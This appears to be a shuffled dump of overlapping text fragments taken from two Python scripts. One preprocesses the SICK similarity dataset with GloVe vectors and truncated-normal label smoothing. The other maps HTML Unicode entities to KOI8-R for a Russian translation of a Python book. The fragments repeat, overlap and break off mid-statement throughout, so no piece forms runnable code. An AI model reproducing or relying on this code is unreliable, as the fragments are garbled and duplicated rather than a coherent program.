output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with open(filename)", "f: values = [float(l.strip()) for l in f.readlines()] values = [\" \".join([str(l) for", "as f2: for line in f: tok, vec = line.split(\" \", 1) if", "/ sigma) x1 = Phi((b - x) / sigma) x2 = Phi((a -", "- a + 1) c = int(np.ceil(ground_truth + 1E-8)) f = int(np.floor(ground_truth)) pmf[min(c", "from scipy.stats import truncnorm import numpy as np import data def build_vector_cache(glove_filename, vec_cache_filename,", "as np import data def build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building vector cache...\") with open(glove_filename)", "as f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab): with open(tok_filename) as f: for line in", "\"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"), vocab) build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab) if", "+ 1E-8)) f = int(np.floor(ground_truth)) pmf[min(c - a, b - a)] = ground_truth", "np.zeros(b - a + 1) c = int(np.ceil(ground_truth + 1E-8)) f = int(np.floor(ground_truth))", "sigma=1, n_steps=100): def phi(zeta): return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 *", "f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab): with open(tok_filename) as f: for line in f: vocab.update(line.strip().split())", "def main(): base_conf = data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab =", "(np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2) def Phi(x): return 0.5 * (1", "range(n_steps): x = tgt_loc - sigma * tgt_loc_update(x) tn = truncnorm((a - x)", "values = [\" \".join([str(l) for l in smoothed_labels(v, 5)]) for v in values]", "cache...\") with open(glove_filename) as f, open(vec_cache_filename, \"w\") as f2: for line in f:", "a, b - a)] = ground_truth - f pmf[f - a] = c", "x) / sigma) y2 = phi((b - x) / sigma) x1 = Phi((b", "1) if tok in vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec)) def discrete_tnorm(a, b, tgt_loc,", "vector cache...\") with open(glove_filename) as f, open(vec_cache_filename, \"w\") as f2: for line in", "if tok in vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec)) def discrete_tnorm(a, b, tgt_loc, sigma=1,", "vec_cache_filename, vocab): print(\"Building vector cache...\") with open(glove_filename) as f, open(vec_cache_filename, \"w\") as f2:", "erf from scipy.stats import truncnorm import numpy as np import data def build_vector_cache(glove_filename,", "= phi((a - x) / sigma) y2 = phi((b - x) / sigma)", "line in f: tok, vec = line.split(\" \", 1) if tok in vocab:", "= x1 - x2 + 1E-4 return y1 / denom - y2 /", "* zeta**2) def Phi(x): return 0.5 * (1 + erf(x / np.sqrt(2))) def", "y2 = phi((b - x) / sigma) x1 = Phi((b - x) /", "= np.zeros(b - a + 1) c = int(np.ceil(ground_truth + 1E-8)) f =", "- a] = c - ground_truth return pmf def smoothed_labels(truth, n_labels): return discrete_lerp(1,", "sick_conf = data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab = set() for name in (\"train\",", "= truncnorm((a - x) / sigma, (b - x) / sigma, loc=x, scale=sigma)", "for name in (\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab)", "import erf from scipy.stats import truncnorm import numpy as np import data def", "vec)) def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100): def phi(zeta): return 1 / (np.sqrt(2", "x) / sigma, (b - x) / sigma, loc=x, scale=sigma) rrange = np.arange(a,", "sigma, loc=x, scale=sigma) rrange = np.arange(a, b + 1) pmf = tn.pdf(rrange) pmf", "from scipy.special import erf from scipy.stats import truncnorm import numpy as np import", "print(\"Building vector cache...\") with open(glove_filename) as f, open(vec_cache_filename, \"w\") as f2: for line", "Phi(x): return 0.5 * (1 + erf(x / np.sqrt(2))) def tgt_loc_update(x): y1 =", "/ denom x = tgt_loc direction = np.sign(tgt_loc - (b - a)) for", "c = int(np.ceil(ground_truth + 1E-8)) f = int(np.floor(ground_truth)) pmf[min(c - a, b -", "- x) / sigma, loc=x, scale=sigma) rrange = np.arange(a, b + 1) pmf", "discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100): def phi(zeta): return 1 / (np.sqrt(2 * np.pi))", "for l in f.readlines()] values = [\" \".join([str(l) for l in smoothed_labels(v, 5)])", "vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"), vocab) build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab) if __name__ == \"__main__\": main()", "- ground_truth return pmf def smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels, truth) def preprocess(filename,", "- sigma * tgt_loc_update(x) tn = truncnorm((a - x) / sigma, (b -", "- (b - a)) for _ in range(n_steps): x = tgt_loc - sigma", "{}\".format(tok, vec)) def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100): def phi(zeta): return 1 /", "a] = c - ground_truth return pmf def smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels,", "for _ in range(n_steps): x = tgt_loc - sigma * tgt_loc_update(x) tn =", "import numpy as np import data def build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building vector cache...\")", "in f: vocab.update(line.strip().split()) def main(): base_conf = data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder =", "np.sum(pmf) return pmf def discrete_lerp(a, b, ground_truth): pmf = np.zeros(b - a +", "a)] = ground_truth - f pmf[f - a] = c - ground_truth return", "x2 = Phi((a - x) / sigma) denom = x1 - x2 +", "def preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with open(filename) as f: values = [float(l.strip()) for", "with open(glove_filename) as f, open(vec_cache_filename, \"w\") as f2: for line in f: tok,", "import argparse import os from scipy.special import erf from scipy.stats import truncnorm import", "= Phi((a - x) / sigma) denom = x1 - x2 + 1E-4", "data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab = set() for name in", "preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"), vocab) build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache,", "5)]) for v in values] with open(os.path.join(os.path.dirname(filename), output_name), \"w\") as f: f.write(\"\\n\".join(values)) def", "tgt_loc - sigma * tgt_loc_update(x) tn = truncnorm((a - x) / sigma, (b", "data def build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building vector cache...\") with open(glove_filename) as f, open(vec_cache_filename,", "b, ground_truth): pmf = np.zeros(b - a + 1) c = int(np.ceil(ground_truth +", "scale=sigma) rrange = np.arange(a, b + 1) pmf = tn.pdf(rrange) pmf /= np.sum(pmf)", "(b - a)) for _ in range(n_steps): x = tgt_loc - sigma *", "set() for name in (\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"),", "def tgt_loc_update(x): y1 = phi((a - x) / sigma) y2 = phi((b -", "open(os.path.join(os.path.dirname(filename), output_name), \"w\") as f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab): with open(tok_filename) as f:", "vocab.update(line.strip().split()) def main(): base_conf = data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab", "x2 + 1E-4 return y1 / denom - y2 / denom x =", "a)) for _ in range(n_steps): x = tgt_loc - sigma * tgt_loc_update(x) tn", "np.arange(a, b + 1) pmf = tn.pdf(rrange) pmf /= np.sum(pmf) return pmf def", "\"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"), vocab) build_vector_cache(base_conf.wordvecs_file,", "* (1 + erf(x / np.sqrt(2))) def tgt_loc_update(x): y1 = phi((a - x)", "b + 1) pmf = tn.pdf(rrange) pmf /= np.sum(pmf) return pmf def discrete_lerp(a,", "tgt_loc_update(x): y1 = phi((a - x) / sigma) y2 = phi((b - x)", "tok in vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec)) def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100):", "- a, b - a)] = ground_truth - f pmf[f - a] =", "with open(tok_filename) as f: for line in f: vocab.update(line.strip().split()) def main(): base_conf =", "for line in f: vocab.update(line.strip().split()) def main(): base_conf = data.Configs.base_config() sick_conf = data.Configs.sick_config()", "\"dev\", \"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"), vocab)", "- a)] = ground_truth - f pmf[f - a] = c - ground_truth", "= tgt_loc - sigma * tgt_loc_update(x) tn = truncnorm((a - x) / sigma,", "name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"), vocab) build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab)", "pmf[f - a] = c - ground_truth return pmf def smoothed_labels(truth, n_labels): return", "open(filename) as f: values = [float(l.strip()) for l in f.readlines()] values = [\"", "+ 1) c = int(np.ceil(ground_truth + 1E-8)) f = int(np.floor(ground_truth)) pmf[min(c - a,", "def phi(zeta): return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2) def", "as f: for line in f: vocab.update(line.strip().split()) def main(): base_conf = data.Configs.base_config() sick_conf", "- x) / sigma) denom = x1 - x2 + 1E-4 return y1", "x = tgt_loc direction = np.sign(tgt_loc - (b - a)) for _ in", "\"w\") as f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab): with open(tok_filename) as f: for line", "open(vec_cache_filename, \"w\") as f2: for line in f: tok, vec = line.split(\" \",", "def build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building vector cache...\") with open(glove_filename) as f, open(vec_cache_filename, \"w\")", "in f: tok, vec = line.split(\" \", 1) if tok in vocab: vocab.remove(tok)", "= line.split(\" \", 1) if tok in vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec)) def", "x) / sigma) denom = x1 - x2 + 1E-4 return y1 /", "= ground_truth - f pmf[f - a] = c - ground_truth return pmf", "x) / sigma) x1 = Phi((b - x) / sigma) x2 = Phi((a", "scipy.special import erf from scipy.stats import truncnorm import numpy as np import data", "x1 - x2 + 1E-4 return y1 / denom - y2 / denom", "np import data def build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building vector cache...\") with open(glove_filename) as", "vocab): with open(tok_filename) as f: for line in f: vocab.update(line.strip().split()) def main(): base_conf", "* np.pi)) * np.exp(-0.5 * zeta**2) def Phi(x): return 0.5 * (1 +", "tgt_loc direction = np.sign(tgt_loc - (b - a)) for _ in range(n_steps): x", "= set() for name in (\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name,", "(\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"),", "/ sigma, loc=x, scale=sigma) rrange = np.arange(a, b + 1) pmf = tn.pdf(rrange)", "* tgt_loc_update(x) tn = truncnorm((a - x) / sigma, (b - x) /", "np.sign(tgt_loc - (b - a)) for _ in range(n_steps): x = tgt_loc -", "= tn.pdf(rrange) pmf /= np.sum(pmf) return pmf def discrete_lerp(a, b, ground_truth): pmf =", "name in (\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder,", "in f.readlines()] values = [\" \".join([str(l) for l in smoothed_labels(v, 5)]) for v", "discrete_lerp(a, b, ground_truth): pmf = np.zeros(b - a + 1) c = int(np.ceil(ground_truth", "return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2) def Phi(x): return", "def add_vocab(tok_filename, vocab): with open(tok_filename) as f: for line in f: vocab.update(line.strip().split()) def", "in range(n_steps): x = tgt_loc - sigma * tgt_loc_update(x) tn = truncnorm((a -", "f: vocab.update(line.strip().split()) def main(): base_conf = data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder = sick_conf.sick_data", "Phi((b - x) / sigma) x2 = Phi((a - x) / sigma) denom", "return y1 / denom - y2 / denom x = tgt_loc direction =", "vocab): print(\"Building vector cache...\") with open(glove_filename) as f, open(vec_cache_filename, \"w\") as f2: for", "pmf = np.zeros(b - a + 1) c = int(np.ceil(ground_truth + 1E-8)) f", "pmf[min(c - a, b - a)] = ground_truth - f pmf[f - a]", "name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"), vocab) build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab) if __name__ ==", "x) / sigma) x2 = Phi((a - x) / sigma) denom = x1", "sigma) x2 = Phi((a - x) / sigma) denom = x1 - x2", "1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2) def Phi(x): return 0.5", "np.pi)) * np.exp(-0.5 * zeta**2) def Phi(x): return 0.5 * (1 + erf(x", "x) / sigma, loc=x, scale=sigma) rrange = np.arange(a, b + 1) pmf =", "/ np.sqrt(2))) def tgt_loc_update(x): y1 = phi((a - x) / sigma) y2 =", "= np.sign(tgt_loc - (b - a)) for _ in range(n_steps): x = tgt_loc", "import data def build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building vector cache...\") with open(glove_filename) as f,", "= Phi((b - x) / sigma) x2 = Phi((a - x) / sigma)", "int(np.ceil(ground_truth + 1E-8)) f = int(np.floor(ground_truth)) pmf[min(c - a, b - a)] =", "main(): base_conf = data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab = set()", "n_steps=100): def phi(zeta): return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2)", "phi(zeta): return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2) def Phi(x):", "1E-4 return y1 / denom - y2 / denom x = tgt_loc direction", "denom - y2 / denom x = tgt_loc direction = np.sign(tgt_loc - (b", "tok, vec = line.split(\" \", 1) if tok in vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok,", "f2: for line in f: tok, vec = line.split(\" \", 1) if tok", "np.sqrt(2))) def tgt_loc_update(x): y1 = phi((a - x) / sigma) y2 = phi((b", "- a)) for _ in range(n_steps): x = tgt_loc - sigma * tgt_loc_update(x)", "pmf /= np.sum(pmf) return pmf def discrete_lerp(a, b, ground_truth): pmf = np.zeros(b -", "/ sigma, (b - x) / sigma, loc=x, scale=sigma) rrange = np.arange(a, b", "return 0.5 * (1 + erf(x / np.sqrt(2))) def tgt_loc_update(x): y1 = phi((a", "sick_conf.sick_data vocab = set() for name in (\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\"))", "\"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"), vocab) build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab) if __name__ == \"__main__\":", "import os from scipy.special import erf from scipy.stats import truncnorm import numpy as", "f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab): with open(tok_filename) as f: for line in f:", "= sick_conf.sick_data vocab = set() for name in (\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder, name,", "_ in range(n_steps): x = tgt_loc - sigma * tgt_loc_update(x) tn = truncnorm((a", "= phi((b - x) / sigma) x1 = Phi((b - x) / sigma)", "with open(filename) as f: values = [float(l.strip()) for l in f.readlines()] values =", "+ 1E-4 return y1 / denom - y2 / denom x = tgt_loc", "def Phi(x): return 0.5 * (1 + erf(x / np.sqrt(2))) def tgt_loc_update(x): y1", "in vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec)) def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100): def", "(b - x) / sigma, loc=x, scale=sigma) rrange = np.arange(a, b + 1)", "as f, open(vec_cache_filename, \"w\") as f2: for line in f: tok, vec =", "/ sigma) x2 = Phi((a - x) / sigma) denom = x1 -", "b - a)] = ground_truth - f pmf[f - a] = c -", "n_labels): return discrete_lerp(1, n_labels, truth) def preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with open(filename) as", "base_conf = data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab = set() for", "os from scipy.special import erf from scipy.stats import truncnorm import numpy as np" ]
[ "not outfilename: outfilename = filename fsock = open(filename) buffer = fsock.read() fsock.close() buffer", "return unicodeToKOI8R[unicode] else: return unicode def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer) buffer =", "'\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;': '\\xf2', '&#1057;': '\\xf3', '&#1058;': '\\xf4',", "'&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;':", "to KOI8-R-encoded This script is used during the build process of the Russian", "filterFunc=htmlFilter): fileList = [os.path.join(directoryname, f) for f in os.listdir(directoryname)] fileList = filter(filterFunc, fileList)", "'&#1046;': '\\xf6', '&#1047;': '\\xfa', '&#1048;': '\\xe9', '&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;':", "more than once on the same file or directory. \"\"\" __author__ = \"<NAME>", "'\\xdb', '&#1097;': '\\xdd', '&#1098;': '\\xdf', '&#1099;': '\\xd9', '&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0',", "= re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match): unicode = match.group(0) if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else:", "= open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname,", "__license__ = \"Python\" import os import sys import re unicodeToKOI8R = { \\", "unicode = match.group(0) if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return unicode def translateBuffer(buffer): buffer", "'\\xd1', '&#1105;': '\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match):", "'&#1059;': '\\xf5', '&#1060;': '\\xe6', '&#1061;': '\\xe8', '&#1062;': '\\xe3', '&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;':", "\"Python\" import os import sys import re unicodeToKOI8R = { \\ '&#1025;': '\\xb3',", "'&#1048;': '\\xe9', '&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;':", "'&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;':", "'\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2',", "'\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0',", "map(translateFile, fileList) if __name__ == \"__main__\": name = sys.argv[1] if os.path.isdir(name): translateDirectory(name) else:", "HTML file or a directory. If a file, it converts the file in", "re.IGNORECASE) def translateMatch(match): unicode = match.group(0) if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return unicode", "'\\xe4', '&#1045;': '\\xe5', '&#1046;': '\\xf6', '&#1047;': '\\xfa', '&#1048;': '\\xe9', '&#1049;': '\\xea', '&#1050;': '\\xeb',", "(c) 2001 <NAME>\" __license__ = \"Python\" import os import sys import re unicodeToKOI8R", "translateDirectory(directoryname, filterFunc=htmlFilter): fileList = [os.path.join(directoryname, f) for f in os.listdir(directoryname)] fileList = filter(filterFunc,", "'\\xdd', '&#1098;': '\\xdf', '&#1099;': '\\xd9', '&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1',", "'&#1062;': '\\xe3', '&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;':", "either an HTML file or a directory. If a file, it converts the", "'\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3',", "open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname, filterFunc=htmlFilter):", "'\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca',", "\\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4',", "'&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;': '\\xf2', '&#1057;':", "the same file or directory. \"\"\" __author__ = \"<NAME> (<EMAIL>)\" __version__ = \"$Revision:", "'&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd', '&#1098;':", "\"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__ = \"Copyright (c)", "'&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5', '&#1046;': '\\xf6', '&#1047;': '\\xfa', '&#1048;': '\\xe9', '&#1049;':", "= translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1] ==", "fileList = filter(filterFunc, fileList) map(translateFile, fileList) if __name__ == \"__main__\": name = sys.argv[1]", "recursively). Safe but pointless to run more than once on the same file", "'\\xe9', '&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef',", "directory. If a file, it converts the file in place; if a directory,", "'\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5', '&#1046;': '\\xf6',", "translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R', buffer) return buffer def translateFile(filename,", "'&#1055;': '\\xf0', '&#1056;': '\\xf2', '&#1057;': '\\xf3', '&#1058;': '\\xf4', '&#1059;': '\\xf5', '&#1060;': '\\xe6', '&#1061;':", "unicode def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R', buffer) return buffer", "'\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;': '\\xf2',", "'\\xf4', '&#1059;': '\\xf5', '&#1060;': '\\xe6', '&#1061;': '\\xe8', '&#1062;': '\\xe3', '&#1063;': '\\xfe', '&#1064;': '\\xfb',", "'&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;':", "f) for f in os.listdir(directoryname)] fileList = filter(filterFunc, fileList) map(translateFile, fileList) if __name__", "'&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;':", "re unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7',", "'\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5', '&#1046;': '\\xf6', '&#1047;': '\\xfa', '&#1048;': '\\xe9', '&#1049;': '\\xea',", "== '.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList = [os.path.join(directoryname, f) for f in os.listdir(directoryname)]", "def translateDirectory(directoryname, filterFunc=htmlFilter): fileList = [os.path.join(directoryname, f) for f in os.listdir(directoryname)] fileList =", "file or directory. \"\"\" __author__ = \"<NAME> (<EMAIL>)\" __version__ = \"$Revision: 1.2 $\"", "'\\xc2', '&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda',", "'&#1098;': '\\xdf', '&#1099;': '\\xd9', '&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;':", "fsock.close() buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename): return", "a directory, it converts every HTML file in the immediate directory (but not", "= filename fsock = open(filename) buffer = fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock", "'\\xf0', '&#1056;': '\\xf2', '&#1057;': '\\xf3', '&#1058;': '\\xf4', '&#1059;': '\\xf5', '&#1060;': '\\xe6', '&#1061;': '\\xe8',", "translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1] == '.html'", "it converts every HTML file in the immediate directory (but not recursively). Safe", "'&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;':", "filename fsock = open(filename) buffer = fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock =", "translation of \"Dive Into Python\" (http://diveintopython.org/). It takes one argument, which can be", "'\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1', '&#1073;': '\\xc2', '&#1074;': '\\xd7',", "'&#1061;': '\\xe8', '&#1062;': '\\xe3', '&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;':", "$\" __copyright__ = \"Copyright (c) 2001 <NAME>\" __license__ = \"Python\" import os import", "else: return unicode def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R', buffer)", "fsock = open(filename) buffer = fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock = open(outfilename,", "'&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd', '&#1098;': '\\xdf', '&#1099;': '\\xd9', '&#1100;': '\\xd8', '&#1101;':", "'\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd', '&#1098;': '\\xdf',", "or directory. \"\"\" __author__ = \"<NAME> (<EMAIL>)\" __version__ = \"$Revision: 1.2 $\" __date__", "'\\xf2', '&#1057;': '\\xf3', '&#1058;': '\\xf4', '&#1059;': '\\xf5', '&#1060;': '\\xe6', '&#1061;': '\\xe8', '&#1062;': '\\xe3',", "os import sys import re unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1',", "'\\xf1', '&#1072;': '\\xc1', '&#1073;': '\\xc2', '&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5',", "charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match): unicode = match.group(0) if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode]", "'\\xd9', '&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern", "'\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1', '&#1073;': '\\xc2', '&#1074;': '\\xd7', '&#1075;': '\\xc7',", "= filter(filterFunc, fileList) map(translateFile, fileList) if __name__ == \"__main__\": name = sys.argv[1] if", "'&#1097;': '\\xdd', '&#1098;': '\\xdf', '&#1099;': '\\xd9', '&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;':", "'\\xf6', '&#1047;': '\\xfa', '&#1048;': '\\xe9', '&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed',", "'\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9',", "fileList) if __name__ == \"__main__\": name = sys.argv[1] if os.path.isdir(name): translateDirectory(name) else: translateFile(name)", "'&#1073;': '\\xc2', '&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;':", "'\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6',", "'\\xdf', 